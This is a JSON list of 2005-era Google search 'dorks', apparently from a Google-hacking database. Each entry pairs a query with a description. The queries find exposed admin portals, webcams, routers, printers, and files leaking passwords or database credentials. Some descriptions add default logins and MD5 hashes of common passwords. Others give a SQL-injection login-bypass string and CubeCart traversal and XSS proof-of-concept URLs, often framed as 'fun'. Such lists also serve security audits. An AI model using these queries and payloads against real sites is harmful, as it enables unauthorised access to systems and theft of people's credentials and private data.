This is also part of cgi scanning tools like: http://www.cirt.net/nikto/UPDATES/1.34/scan_database.db", "submited": "2005-02-01", "request": "inurl:na_admin", "id": 853}, {"short description": "intitle:\"Connection Status\" intext:\"Current login\"", "long description": "This is an intriguing way of finding various '5861 DMT Routers' - the presence of a web-interface to the router also indicates the presence of a telnet interface to the router!", "submited": "2005-02-02", "request": "intitle:\"Connection Status\" intext:\"Current login\"", "id": 854}, {"short description": "intitle:\"welcome to netware *\" -site:novell.com", "long description": "Novell login portals offering various services storage, printing, email or LDAP access", "submited": "2005-02-03", "request": "intitle:\"welcome to netware *\" -site:novell.com", "id": 855}, {"short description": "intitle:\"Brother\" intext:\"View Configuration\" intext:\"Brother Industries, Ltd.\"", "long description": "Finds a real bunch of Brother printers", "submited": "2005-02-04", "request": "intitle:\"Brother\" intext:\"View Configuration\" intext:\"Brother Industries, Ltd.\"", "id": 856}, {"short description": "filetype:inc mysql_connect OR mysql_pconnect", "long description": "INC files have PHP code within them that contain unencrypted usernames, passwords, and addresses for the corresponding databases. Very dangerous stuff. 
The mysql_connect file is especially dangerous because it handles the actual connection and authentication with the database.", "submited": "2005-02-09", "request": "filetype:inc mysql_connect OR mysql_pconnect", "id": 857}, {"short description": "\"IceWarp Web Mail 5.3.0\" \"Powered by IceWarp\"", "long description": "IceWarp Web Mail 5.3.0Multiple cross-site scripting and HTML injection vulnerabilities.http://www.securityfocus.com/bid/12396/", "submited": "2005-02-07", "request": "\"IceWarp Web Mail 5.3.0\" \"Powered by IceWarp\"", "id": 858}, {"short description": "\"Powered by DUpaypal\" -site:duware.com", "long description": "Here is another DUware product, DUpaypal. Once you get hold of the database it contains the admin username and password. The default by the way is admin/passwordThe default location for the database is ../_private/DUpaypal.mdb", "submited": "2005-02-07", "request": "\"Powered by DUpaypal\" -site:duware.com", "id": 859}, {"short description": "-site:php.net -\"The PHP Group\" inurl:source inurl:url ext:pHp", "long description": "scripts to view the source code of PHP scripts running on the server. Can be very interesting if it is also allowed to open configuration files ;-)", "submited": "2005-02-15", "request": "-site:php.net -\"The PHP Group\" inurl:source inurl:url ext:pHp", "id": 860}, {"short description": "\"Microsoft CRM : Unsupported Browser Version\"", "long description": "Microsoft CRM Login portal.MS says:Microsoft CRM integrates with Microsoft Office, Microsoft Business Solutions for Financial Management, and other business systems to give employees a complete view of customer information. 
The ease of integration with Microsoft Office is of particular value enabling staff to access Microsoft CRM information from Microsoft Office Outlook and work online or offline with access to sales functionality.", "submited": "2005-02-15", "request": "\"Microsoft CRM : Unsupported Browser Version\"", "id": 861}, {"short description": "intitle:\"switch login\" \"IBM Fast Ethernet Desktop\"", "long description": "IBM 8275 Model 416 High Performance Ethernet Workgroup Switch", "submited": "2005-02-15", "request": "intitle:\"switch login\" \"IBM Fast Ethernet Desktop\"", "id": 862}, {"short description": "\"Powered by Link Department\"", "long description": "Link management script with advanced yet easy to use admin control panel, fully template driven appearance, static HTML front-end and email notifications.Below the link list a folder 'ld' exists which contains various juicy information like encrypted admin passwords and session data.", "submited": "2005-02-15", "request": "\"Powered by Link Department\"", "id": 863}, {"short description": "\"Powered by MercuryBoard [v1\"", "long description": "Exploit for MercuryBoard:http://www.securityfocus.com/archive/1/389881/2005-02-06/2005-02-12/0Enter the following search:\"Powered by MercuryBoard [v1\"And the exploit does work!", "submited": "2005-02-09", "request": "\"Powered by MercuryBoard [v1\"", "id": 864}, {"short description": "intitle:\"Index of\" sc_serv.conf sc_serv content", "long description": "This dork lists sc_serv.conf files. 
These files contain information for Shoutcast servers and often contain cleartext passwords.Original dork: filetype:conf sc_serv.confCleaned by: c0wzClean date: 2005-04-26", "submited": "2005-02-10", "request": "intitle:\"Index of\" sc_serv.conf sc_serv content", "id": 865}, {"short description": "intitle:\"welcome to mono xsp\"", "long description": "XSD is the demo webserver for the Mono project and allows the execution of ASP.NET on Unix", "submited": "2005-02-15", "request": "intitle:\"welcome to mono xsp\"", "id": 866}, {"short description": "intitle:\"DEFAULT_CONFIG - HP\"", "long description": "High scalable Ethernet switches by HP running in the default configuration", "submited": "2005-02-15", "request": "intitle:\"DEFAULT_CONFIG - HP\"", "id": 867}, {"short description": "intitle:\"web server status\" SSH Telnet", "long description": "simple port scanners for most common ports", "submited": "2005-02-15", "request": "intitle:\"web server status\" SSH Telnet", "id": 868}, {"short description": "intitle:opengroupware.org \"resistance is obsolete\" \"Report Bugs\" \"Username\" \"password\"", "long description": "Open groupware is a comprehensive open source groupware project running on all major platforms.", "submited": "2005-02-15", "request": "intitle:opengroupware.org \"resistance is obsolete\" \"Report Bugs\" \"Username\" \"password\"", "id": 869}, {"short description": "intitle:Linksys site:ourlinksys.com", "long description": "Ourlinksys.com DDNS entries pointing to Linksys web enabled cameras", "submited": "2005-02-15", "request": "intitle:Linksys site:ourlinksys.com", "id": 870}, {"short description": "intitle:\"supervisioncam protocol\"", "long description": "\"SupervisionCam captures and compares images from video cameras, (internet) image files or the computer screen at intervals you define. 
It starts optional activities when a movement is detected.\"", "submited": "2005-02-22", "request": "intitle:\"supervisioncam protocol\"", "id": 871}, {"short description": "+\"HSTSNR\" -\"netop.com\"", "long description": "This search reveals NetOp license files. From the netop website: \"NetOp Remote Control is the most comprehensive, effective and security-conscious way to maintain your IT operations. Designed to fit into all environments, NetOp lets you access users running virtually any operating system, including Windows, Linux, Mac OS X and Solaris. Location isn't terribly important either. The program offers unrivalled connectivity, supporting all standard communication protocols. Finally, NetOp is also the ideal way to manage and administrate your servers. The system contains a sweeping range of remote management tools, all available on one easy-to-use console.\"", "submited": "2005-02-28", "request": "+\"HSTSNR\" -\"netop.com\"", "id": 872}, {"short description": "inurl:getmsg.html intitle:hotmail", "long description": "These pages contain hotmail messages that were saved as HTML. These messages can contain anything from personal data to cleartext passwords.", "submited": "2005-03-02", "request": "inurl:getmsg.html intitle:hotmail", "id": 873}, {"short description": "intext:\"Please enter correct password for Administrator Access. Thank you\" \"Copyright 2003 SMC Networks, Inc. All rights reserved.\"", "long description": "Finds SMC Routers.", "submited": "2005-02-12", "request": "intext:\"Please enter correct password for Administrator Access. Thank you\" \"Copyright 2003 SMC Networks, Inc. All rights reserved.\"", "id": 874}, {"short description": "\"delete entries\" inurl:admin/delete.asp", "long description": "As described in OSVDB article #13715:\"AspJar contains a flaw that may allow a malicious user to delete arbitrary messages. The issue is triggered when the authentication method is bypassed and /admin/delete.asp is accessed directly. 
It is possible that the flaw may allow a malicious user to delete messages resulting in a loss of integrity.\"The company supporting this software is no longer in business and the software is no longer being updated. Therefore, versions should not matter in this dork.", "submited": "2005-02-17", "request": "\"delete entries\" inurl:admin/delete.asp", "id": 875}, {"short description": "inurl:camctrl.cgi", "long description": "Vivotec web cams", "submited": "2005-03-05", "request": "inurl:camctrl.cgi", "id": 876}, {"short description": "allintitle:Brains, Corp. camera", "long description": "mmEye webcam / cam servermmEye is a multifunction multimedia server equipped with 32bit RISC CPU SH-3, and runs UNIX operating system (NetBSD).It has video input ports (1 S signal port, 2 composite signal ports) and PCMCIA Type II slots built in.", "submited": "2005-03-05", "request": "allintitle:Brains, Corp. camera", "id": 877}, {"short description": "\"Traffic Analysis for\" \"RMON Port * on unit *\"", "long description": "List of RMON ports produced by MRTG which is a network traffic analysis tool. See also #198", "submited": "2005-03-05", "request": "\"Traffic Analysis for\" \"RMON Port * on unit *\"", "id": 878}, {"short description": "allintitle:aspjar.com guestbook", "long description": "\"An input validation vulnerability was reported in the ASPJar guestbook. A remote user can gain administrative access and can delete guestbook messages.The '/admin/login.asp' script does not properly validate user-supplied input in the password field. A remote user can supply the following characters in password field to inject SQL commands and be authenticated as the administrator:\"' or ''='I also found another vulnerability that hasn't been documented anywhere. 
Using the above search to find aspjar guestbooks, appending the guestbook directory with /data/guest.mdb will give you a database containing the plaintext username and password for the guestbook admin and all entries in the guestbook, including IP addresses of users.(This company is no longer in business and the software is no longer being updated so versions shouldn't matter)", "submited": "2005-02-18", "request": "allintitle:aspjar.com guestbook", "id": 879}, {"short description": "filetype:sql (\"values * MD5\" | \"values * password\" | \"values * encrypt\")", "long description": "Locate insert statements making use of some builtin function to encrypt a password. PASSWORD(), ENCRYPT() and MD5() are searched.", "submited": "2005-02-23", "request": "filetype:sql (\"values * MD5\" | \"values * password\" | \"values * encrypt\")", "id": 880}, {"short description": "filetype:sql (\"passwd values\" | \"password values\" | \"pass values\" )", "long description": "Find insert statements where the field (or table name) preceding the operator VALUES will be 'password' or 'passwd' or 'pass'. 
The rest of the statement should contain encrypted or plaintext password.An attacker can use these files to acquire database permissions that normally would not be given to the masses.", "submited": "2005-02-23", "request": "filetype:sql (\"passwd values\" | \"password values\" | \"pass values\" )", "id": 881}, {"short description": "(inurl:81-cobalt | inurl:cgi-bin/.cobalt)", "long description": "Cobal RaQ internal pages", "submited": "2005-03-05", "request": "(inurl:81-cobalt | inurl:cgi-bin/.cobalt)", "id": 882}, {"short description": "inurl:WCP_USER", "long description": "WebConnect is client-server based software that provides secure browser based emulation to mainframe, midrange and UNIX systems", "submited": "2005-03-05", "request": "inurl:WCP_USER", "id": 883}, {"short description": "intitle:\"Dell Laser Printer\" ews", "long description": "Finds Dell's printers with EWS.EWS : Embedded Web Server technology enables the usage of a standard web browser to manage many aspects of the printer, for example, view consumable life, configure network parameters, view serial number information, printer usage etc..", "submited": "2005-03-04", "request": "intitle:\"Dell Laser Printer\" ews", "id": 884}, {"short description": "intitle:\"Kurant Corporation StoreSense\" filetype:bok", "long description": "These are Kurant StoreSense admin logon pages.", "submited": "2005-03-15", "request": "intitle:\"Kurant Corporation StoreSense\" filetype:bok", "id": 885}, {"short description": "intitle:\"active webcam page\"", "long description": "searches for \"Active Webcam\" feeds on websites, a popular USB webcam interface.", "submited": "2005-02-15", "request": "intitle:\"active webcam page\"", "id": 886}, {"short description": "\"powered by CubeCart 2.0\"", "long description": "This search reveals an alarming number of servers running versions of Brooky CubeCart that are reported to be prone to multiple vulnerabilities due to insufficient sanitization of user-supplied 
data....susceptible to a remote directory traversal vulnerability...cross-site scripting vulnerability may allow for theft of cookie-based authentication credentials or other attacks.An exploit is not required.The following proof of concept examples are available:http://www.example.com/index.php?&language=../../../../../../../../etc/passwdhttp://www.example.com/index.php?&language=var%20test_variable=31337;alert(test_variable); Vulnerability was published 2-14-2005http://www.securityfocus.com/bid/12549/", "submited": "2005-02-16", "request": "\"powered by CubeCart 2.0\"", "id": 887}, {"short description": "filetype:ora tnsnames", "long description": "This searches for tns names files. This is an Oracle configuration file that sets up connection strings for someone's Oracle client to contact the various databases it is managing. This file contains ports, IP's and server names of these database machines. What I think is more telling is that in most cases, this file is stored in Oracle's installation directory which can probably be more telling.", "submited": "2005-02-15", "request": "filetype:ora tnsnames", "id": 888}, {"short description": "intitle:\"Belarc Advisor Current Profile\" intext:\"Click here for Belarc's PC Management products, for large and small companies.\"", "long description": "People who have foolishly published an audit of their machine(s) on the net with some server info as well", "submited": "2005-02-15", "request": "intitle:\"Belarc Advisor Current Profile\" intext:\"Click here for Belarc's PC Management products, for large and small companies.\"", "id": 889}, {"short description": "intitle:\"SuSE Linux Openexchange Server\" \"Please activate JavaScript!\"", "long description": "Another way to find the web administration portal of linux open exchange servers.", "submited": "2005-03-12", "request": "intitle:\"SuSE Linux Openexchange Server\" \"Please activate JavaScript!\"", "id": 890}, {"short description": "inurl:\"suse/login.pl\"", "long 
description": "More Suse login portals, mostly Open Exchange.", "submited": "2005-02-20", "request": "inurl:\"suse/login.pl\"", "id": 891}, {"short description": "intitle:HomeSeer.Web.Control | Home.Status.Events.Log", "long description": "HomeSeer (http://www.homeseer.com/) provides a well known home automation solution (software + hardware)This dork will find web interfaces of homeseer.", "submited": "2005-03-18", "request": "intitle:HomeSeer.Web.Control | Home.Status.Events.Log", "id": 892}, {"short description": "Powered.by.RaidenHTTPD intitle:index.of", "long description": "RaidenHTTPD ( http://www.raidenhttpd.com/en ) is a full featured web server software for Windows", "submited": "2005-03-18", "request": "Powered.by.RaidenHTTPD intitle:index.of", "id": 893}, {"short description": "filetype:ini Desktop.ini intext:mydocs.dll", "long description": "This dork finds any webshared windows folder inside my docs. You can change the end bit \"intext:mydocs.dll\" by looking inside any of your your own folders on your pc, looking for the desktop.ini file and add some of the information to the query. For Anouther example - Shell Folders (Favourite etc) filetype:ini Desktop.iniintext:shell32.dllEnjoy", "submited": "2005-02-17", "request": "filetype:ini Desktop.iniintext:mydocs.dll", "id": 894}, {"short description": "\"#mysql dump\" filetype:sql 21232f297a57a5a743894a0e4a801fc3", "long description": "this is a mod of one of the previous queries posted in here. 
the basic thing is, to add this:21232f297a57a5a743894a0e4a801fc3to your query, that oryginally results in a username lists with a MD5 encrypted password.this one finds mysql dumps with for a users who's passwordsare \"admin\" :)the \"21232f297a57a5a743894a0e4a801fc3\" is md5 result for \"admin\"you can try it with other queris on this site.use also:63a9f0ea7bb98050796b649e85481845 for root098f6bcd4621d373cade4e832627b4f6 for test3c3662bcb661d6de679c636744c66b62 for sexf561aaf6ef0bf14d4208bb46a4ccb3ad for xxxif you'll get lucky, you'll get a username, and a encryoted password, witch is the one above that u used.remember, that this works for all files that contain plaintex username and md5 encrypted passwords. use this techniq with other queris that you'll find hereuff... i hope i made my self clear.", "submited": "2005-02-28", "request": "\"#mysql dump\" filetype:sql 21232f297a57a5a743894a0e4a801fc3", "id": 895}, {"short description": "allinurl:wps/portal/ login", "long description": "Login to IBM WebSphere Portal.You may find portals using standard administrator user/password which gave you complete access to the application itself.", "submited": "2005-02-24", "request": "allinurl:wps/portal/ login", "id": 896}, {"short description": "intitle:asterisk.management.portal web-access", "long description": "Coalescent Systems Inc. launched The Asterisk Management Portal project to bring together best-of-breed applications to produce a \"canned\" (but fully functional) turn-key small business phone system based on The Asterisk Open Source PBX.", "submited": "2005-03-20", "request": "intitle:asterisk.management.portal web-access", "id": 897}, {"short description": "intitle:\"Flash Operator Panel\" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists", "long description": "Flash Operator Panel is a switchboard type application for the Asterisk PBX. It runs on a web browser with the flash plugin. 
It is able to display information about your PBX activity in real time.", "submited": "2005-03-20", "request": "intitle:\"Flash Operator Panel\" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists", "id": 898}, {"short description": "ext:txt inurl:unattend.txt", "long description": "the unattend.txt is used to drive unanttended MS Windows installations. The files contain all information for a Windows information including Administrator's passwords, IP addresses and product IDs.", "submited": "2005-03-20", "request": "ext:txt inurl:unattend.txt", "id": 899}, {"short description": "filetype:inf sysprep", "long description": "sysprep is used to drive unanttended MS Windows installations. The files contain all information for a Windows information including Administrator's passwords, IP addresses and product IDs.", "submited": "2005-03-20", "request": "filetype:inf sysprep", "id": 900}, {"short description": "intitle:\"Service Managed Gateway Login\"", "long description": "service Managed Gateway from VirtualAccess login page", "submited": "2005-03-20", "request": "intitle:\"Service Managed Gateway Login\"", "id": 901}, {"short description": "\"Powered by UebiMiau\" -site:sourceforge.net", "long description": "UebiMiau is a simple, yet efficient cross-plataform POP3/IMAP mail reader written in PHP. 
It's have some many features, such as: Folders, View and Send Attachments, Preferences, Search, Quota Limit", "submited": "2005-03-20", "request": "\"Powered by UebiMiau\" -site:sourceforge.net", "id": 902}, {"short description": "inurl:webmail./index.pl \"Interface\"", "long description": "Webmail system which reveals that the website is hosted by vDeck", "submited": "2005-03-20", "request": "inurl:webmail./index.pl \"Interface\"", "id": 903}, {"short description": "intitle:\"BorderWare MXtreme Mail Firewall Login\"", "long description": "BorderWare MXtreme Mail firewallMXtreme is a hardened appliance with a highly robust mail transfer agent (MTA) and email gateway that prevents email-borne threats from entering your network while protecting against spam and viruses.", "submited": "2005-03-20", "request": "intitle:\"BorderWare MXtreme Mail Firewall Login\"", "id": 904}, {"short description": "intitle:\"actiontec\" main setup status \"Copyright 2001 Actiontec Electronics Inc\"", "long description": "Actiontec Routers.", "submited": "2005-03-20", "request": "intitle:\"actiontec\" main setup status \"Copyright 2001 Actiontec Electronics Inc\"", "id": 905}, {"short description": "Powered.by:.vBulletin.Version ...3.0.6", "long description": "vBulletin is reported prone to an arbitrary PHP script code execution vulnerability. The issue is reported to exist due to a lack of sufficient input sanitization performed on user-supplied data before this data is included in a dynamically generated scripthttp://www.securityfocus.com/bid/12622/info/", "submited": "2005-03-20", "request": "Powered.by:.vBulletin.Version ...3.0.6", "id": 906}, {"short description": "intitle:\"VMware Management Interface:\" inurl:\"vmware/en/\"", "long description": "VMware GSX Server is enterprise-class virtual infrastructure software for x86-based servers. 
It is ideal for server consolidation, disaster recovery and streamlining software development processes.", "submited": "2005-03-20", "request": "intitle:\"VMware Management Interface:\" inurl:\"vmware/en/\"", "id": 907}, {"short description": "filetype:php intitle:\"paNews v2.0b4\"", "long description": "PaNews is reported prone to a remote PHP script code execution vulnerability. It is reported that PHP script code may be injected into the PaNews software through the 'showcopy' parameter of the 'admin_setup.php' script. http://www.securityfocus.com/bid/12611", "submited": "2005-03-20", "request": "filetype:php intitle:\"paNews v2.0b4\"", "id": 908}, {"short description": "\"Webthru User Login\"", "long description": "samsung webthru cameras", "submited": "2005-03-20", "request": "\"Webthru User Login\"", "id": 909}, {"short description": "ext:cgi intitle:\"control panel\" \"enter your owner password to continue!\"", "long description": "Free Perl Guestbook (FPG) administration page. Only a password is needed to logon.", "submited": "2005-03-20", "request": "ext:cgi intitle:\"control panel\" \"enter your owner password to continue!\"", "id": 910}, {"short description": "intitle:\"ListMail Login\" admin -demo", "long description": "Listmail mailinglist manager admin logon", "submited": "2005-03-20", "request": "intitle:\"ListMail Login\" admin -demo", "id": 911}, {"short description": "intitle:\"Test Page for the Apache HTTP Server on Fedora Core\" intext:\"Fedora Core Test Page\"", "long description": "Apache 2.0 on Fedore Core Test page", "submited": "2005-03-20", "request": "intitle:\"Test Page for the Apache HTTP Server on Fedora Core\" intext:\"Fedora Core Test Page\"", "id": 912}, {"short description": "\"Powered by: vBulletin Version 1.1.5\"", "long description": "This google dork reveals vulnerable message boards. It works for all Vbulletin version up to 2.0 beta 2. 
To try for other versions just change the version number in the dork.These vulnerable message boards allow remote code execution.More on this can be found here:http://www.securiteam.com/securitynews/5IP0B203PI.htmlit has a fairly good explanation of the exploits incorporated with these versions.", "submited": "2005-03-19", "request": "\"Powered by: vBulletin Version 1.1.5\"", "id": 913}, {"short description": "wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin", "long description": "This is a filtered version of previous 'inurl:passwd' searches, focusing on WWWBoard [1]. There are different crypt functions involved [2], but the default username and password is 'WebAdmin:WebBoard' without the quotes. This is my first Googledork entry, so be gentle :)Funny enough, many of the DES hashes seem to use a salt of \"ae\". I tried just using this string along with the inurl portion, but it seemed to inappropriately restrict the search. Couple this with [3] and, um, yeah.cykyc[1]http://www.scriptarchive.com/wwwboard.html[2]http://www.scriptarchive.com/faq/wwwboard.html#q2[3]http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=625", "submited": "2005-03-28", "request": "wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin", "id": 914}, {"short description": "intitle:asterisk.management.portal web-access", "long description": "VOXBOX Asterisk web management. Allows to manage Asterisk configuration like calls and SIP settings.", "submited": "2005-03-29", "request": "intitle:asterisk.management.portal web-access", "id": 915}, {"short description": "intitle:index.of /maildir/new/", "long description": "search gives you a mailbox dir. 
Contains a lot of mails.", "submited": "2005-03-26", "request": "intitle:index.of /maildir/new/", "id": 916}, {"short description": "intitle:\"Flash Operator Panel\" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists", "long description": "Flash Operator Panel is a switchboard type application for the Asterisk PBX. It runs on a web browser with the flash plugin. It is able to display information about your PBX activity in real time.", "submited": "2005-03-29", "request": "intitle:\"Flash Operator Panel\" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists", "id": 917}, {"short description": "\"Powered by Coppermine Photo Gallery\" ( \"v1.2.2 b\" | \"v1.2.1\" | \"v1.2\" | \"v1.1\" | \"v1.0\")", "long description": "Reportedly Coppermine Photo Gallery is prone to multiple input validation vulnerabilities, some of which may lead to arbitrary command execution. These issues are due to the application failing to properly sanitize and validate user-supplied input prior to using it in dynamic content and system command execution function calls.These issues may be exploited to steal cookie based authentication credentials, map the application root directory of the affected application, execute arbitrary commands and include arbitrary files. 
Other attacks are also possible.http://www.securityfocus.com/bid/10253/", "submited": "2005-03-29", "request": "\"Powered by Coppermine Photo Gallery\" ( \"v1.2.2 b\" | \"v1.2.1\" | \"v1.2\" | \"v1.1\" | \"v1.0\")", "id": 918}, {"short description": "WebLog Referrers", "long description": "ExpressionEngine is a modular, flexible, feature-packed web publishing system that adapts to a broad range of needs.", "submited": "2005-03-30", "request": "allinurl:\"weblog/referrers\"", "id": 919}, {"short description": "inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0", "long description": "eHealth, a network management solution, enables its users to manage performance and availability of LANs, WANs, routers, Switches, Frame Relay, ATM, Remote Access Equipment, QoS, Wireless LAN, DAL, Voice and Cable technologies.", "submited": "2005-03-31", "request": "inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0", "id": 920}, {"short description": "yaws.*.server.at", "long description": "YAWS (http://yaws.hyber.org), Yet Another Web Server, is a HTTP high perfomance 1.1 webserver. Yaws is entirely written in Erlang, furthermore it is a multithreaded webserver where one Erlang light weight process is used to handle each client.", "submited": "2005-03-31", "request": "yaws.*.server.at", "id": 921}, {"short description": "intitle:\"IPC@CHIP Infopage\"", "long description": "web server detection for IPC@chip embedded webserverThe dork uses the webserver's infopage which reveals some very interesting information.See securityfocus advisory for more info: http://www.securityfocus.com/bid/2767", "submited": "2005-03-29", "request": "intitle:\"IPC@CHIP Infopage\"", "id": 922}, {"short description": "thttpd webserver", "long description": "thttpd is is a webserver written in C and should compile and run on most unix-like systems. 
As of version 2.20 or later, thttpd is known to build and run on the following platforms, usually on at least recent platform versions: * FreeBSD* NetBSD* BSD/OS* Solaris* Tru64 / DIGITAL UNIX / OSF/1* SunOS* Linux* HP-UX* MacOS X* UnixWare* AMIGAOS* NCR MP-RAS BASE 3.02 (EISA/MCA)* Sega Dreamcast* Compaq iPaq 3765* Windows 2000/XP (port of 2.07 only)", "submited": "2005-03-29", "request": "intitle:\"Index of *\" mode links bytes last-changed name", "id": 923}, {"short description": "intitle:endymion.sak.mail.login.page | inurl:sake.servlet", "long description": "sak Mail, servlet-based web email system, designed for scaling to large numbers of concurrent users. Intended for large universities or enterprise-level mail system", "submited": "2005-03-31", "request": "intitle:endymion.sak.mail.login.page | inurl:sake.servlet", "id": 924}, {"short description": "intitle:\"OfficeConnect Wireless 11g Access Point\" \"Checking your browser\"", "long description": "OfficeConnect Wireless 11g Access Point", "submited": "2005-04-12", "request": "intitle:\"OfficeConnect Wireless 11g Access Point\" \"Checking your browser\"", "id": 925}, {"short description": "powered.by.instaBoard.version.1.3", "long description": "InstaBoard is a coldfusion forum solution. In its version 1.3 it is vulnerable to SQL Injection.Bugtraq ID 7338", "submited": "2005-04-12", "request": "powered.by.instaBoard.version.1.3", "id": 926}, {"short description": "intitle:\"Lexmark *\" inurl:port_0", "long description": "Lexmark printers (4 models)", "submited": "2005-04-12", "request": "intitle:\"Lexmark *\" inurl:port_0", "id": 927}, {"short description": "inurl:/en/help.cgi \"ID=*\"", "long description": "Aficio printers (this search locates the help pages)", "submited": "2005-04-12", "request": "inurl:/en/help.cgi \"ID=*\"", "id": 928}, {"short description": "intitle:jdewshlp \"Welcome to the Embedded Web Server!\"", "long description": "HP Officejet help page. 
Remove \"help.html\" for main page.", "submited": "2005-04-12", "request": "intitle:jdewshlp \"Welcome to the Embedded Web Server!\"", "id": 929}, {"short description": "\"display printer status\" intitle:\"Home\"", "long description": "Xerox Phaser printers.", "submited": "2005-04-16", "request": "\"display printer status\" intitle:\"Home\"", "id": 930}, {"short description": "inurl:JPGLogin.htm", "long description": "webserver detection for GeoHttpServer, the page is the login page or guest cam. Don't ask why these are mostly doggy cams, weirdness.", "submited": "2005-04-12", "request": "inurl:JPGLogin.htm", "id": 931}, {"short description": "intitle:\"Welcome to Windows Small Business Server 2003\"", "long description": "Another way to find Small Business Server 2003, for more results check the dork by JimmyNeutron (id=763).", "submited": "2005-04-16", "request": "intitle:\"Welcome to Windows Small Business Server 2003\"", "id": 932}, {"short description": "intitle:\"OfficeConnect Cable/DSL Gateway\" intext:\"Checking your browser\"", "long description": "This query allows you to find OfficeConnect Cable/DSL Gateways, by locating the browser-check page that Google has indexed. The browser-check page leads to a login page, which kindly informs you of the default password.", "submited": "2005-04-16", "request": "intitle:\"OfficeConnect Cable/DSL Gateway\" intext:\"Checking your browser\"", "id": 933}, {"short description": "intext:\"Powered by phpBB 2.0.13\" inurl:\"cal_view_month.php\"|inurl:\"downloads.php\"", "long description": "phpBB 2.0.13 with installed Calendar Pro MOD are vulnerable to SQL injection attacks. 
An attacker can download the MD5 hashes from the account databse without authorization.", "submited": "2005-04-04", "request": "intext:\"Powered by phpBB 2.0.13\" inurl:\"cal_view_month.php\"|inurl:\"downloads.php\"", "id": 934}, {"short description": "Netscape Application Server Error page", "long description": "This error message highlights potentially unpatched or misconfigured Netscape Application Server or iPlanet application servers. An inquisitive mind would probably want to manually alter the URL's returned by this query, just to see what other, more informative messages might be revealed. As these servers are already exhibiting a misconfiguration, this could lead to other vulnerabilities being discovered.Finally, these servers are running software that is a few years old now. An attacker may feel that because of this, there's a strong possibility that they're not patched-up fully either, making them potentially vulnerable to known exploits.", "submited": "2005-04-05", "request": "intitle:\"404 SC_NOT_FOUND\"", "id": 935}, {"short description": ""SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"", "long description": "you can find many servers infected with sql injection", "submited": "2005-04-07", "request": "\"[SQL Server Driver][SQL Server]Line 1: Incorrect syntax near\" -forum -thread -showthread", "id": 936}, {"short description": "intext:"vbulletin" inurl:admincp", "long description": "vBulletin Admin Control Panel", "submited": "2005-04-09", "request": "intext:\"vbulletin\" inurl:admincp", "id": 937}, {"short description": "intitle:"inc. vpn 3000 concentrator"", "long description": "This search will show the login page for Cisco VPN 3000 concentrators. Since the default user id and password are readily available on the Cisco website, an out-of-the-box or test device could be wide open to mischief.", "submited": "2005-04-11", "request": "intitle:\"inc. 
vpn 3000 concentrator\"", "id": 938}, {"short description": "Winamp Web Interface", "long description": "Just a bit of fun, should reveal a few instances of a Winamp HTTP control program. Without login, you can't do much except see the currently playing track. With login you can have a bit more fun by changing the volume, currently playing track, viewing playlists, etc. With admin access you can delete tracks... I'll leave it to others to find out if anything cool can be done with this.Just a note, you *can't* hear the music the person is playing, it's not a stream interface, just a control interface.", "submited": "2005-04-11", "request": "\"About Winamp Web Interface\" intitle:\"Winamp Web Interface\"", "id": 939}, {"short description": "intitle:ilohamail intext:\"Version 0.8.10\" \"Powered by IlohaMail\"", "long description": "some version of ilohamail are vulnerable.", "submited": "2005-04-11", "request": "intitle:ilohamail intext:\"Version 0.8.10\" \"Powered by IlohaMail\"", "id": 940}, {"short description": "intitle:ilohamail \"Powered by IlohaMail\"", "long description": "IlohaMail is a light-weight yet feature rich multilingual webmail system designed for ease of use, written in pure PHP. It supports web-access to IMAP and POP3 accounts, and includes a complete contacts feature and other PIM features.", "submited": "2005-04-17", "request": "intitle:ilohamail \"Powered by IlohaMail\"", "id": 941}, {"short description": "intitle:\"NeroNET - burning online\"", "long description": "NeroNet is an online burning device by Nero. Basically with this query you'll get a listing of active servers running the software. You can only do things like view active jobs users and the see what disc the server is burning on. However if you manage to log in as the Administrator you can have a bit more fun like change the server and recording settings. 
Well they were smart enough to convienently place the default password located within the softwares manual.", "submited": "2005-04-20", "request": "intitle:\"NeroNET - burning online\"", "id": 942}, {"short description": "\"Parse error: parse error, unexpected T_VARIABLE\" \"on line\" filetype:php", "long description": "PHP error with a full web root path disclosure", "submited": "2005-04-26", "request": "\"Parse error: parse error, unexpected T_VARIABLE\" \"on line\" filetype:php", "id": 943}, {"short description": "\"MacHTTP\" filetype:log inurl:machttp.log", "long description": "MacHTTP is an webserver for Macs running OS 6-9.x. It's pretty good for older Macs but the default install leaves the MacHTTP.log file open to access.", "submited": "2005-04-26", "request": "\"MacHTTP\" filetype:log inurl:machttp.log", "id": 944}, {"short description": "ext:ics ics", "long description": "ICalender Fileder that can contain a lot of useful information about a possible target.", "submited": "2005-04-26", "request": "ext:ics ics", "id": 945}, {"short description": "intitle:\"Default PLESK Page\"", "long description": "Plesk Server Administrator (PSA) is web based software that enables remote administration of web servers. It can be used on Linux and other systems that support PHP.The default page is an indication that no configuration has been done (yet) for the domain", "submited": "2005-04-26", "request": "intitle:\"Default PLESK Page\"", "id": 946}, {"short description": "ext:plist filetype:plist inurl:bookmarks.plist", "long description": "These Safari bookmarks that might show very interesting info about a user's surfing habits", "submited": "2005-04-26", "request": "ext:plist filetype:plist inurl:bookmarks.plist", "id": 947}, {"short description": "intitle:\"Zope Help System\" inurl:HelpSys", "long description": "By itself, this returns Zope's help pages. Manipulation of the URL, changing 'HelpSys' to 'manage', gives a link to a server's Zope Management Interface. 
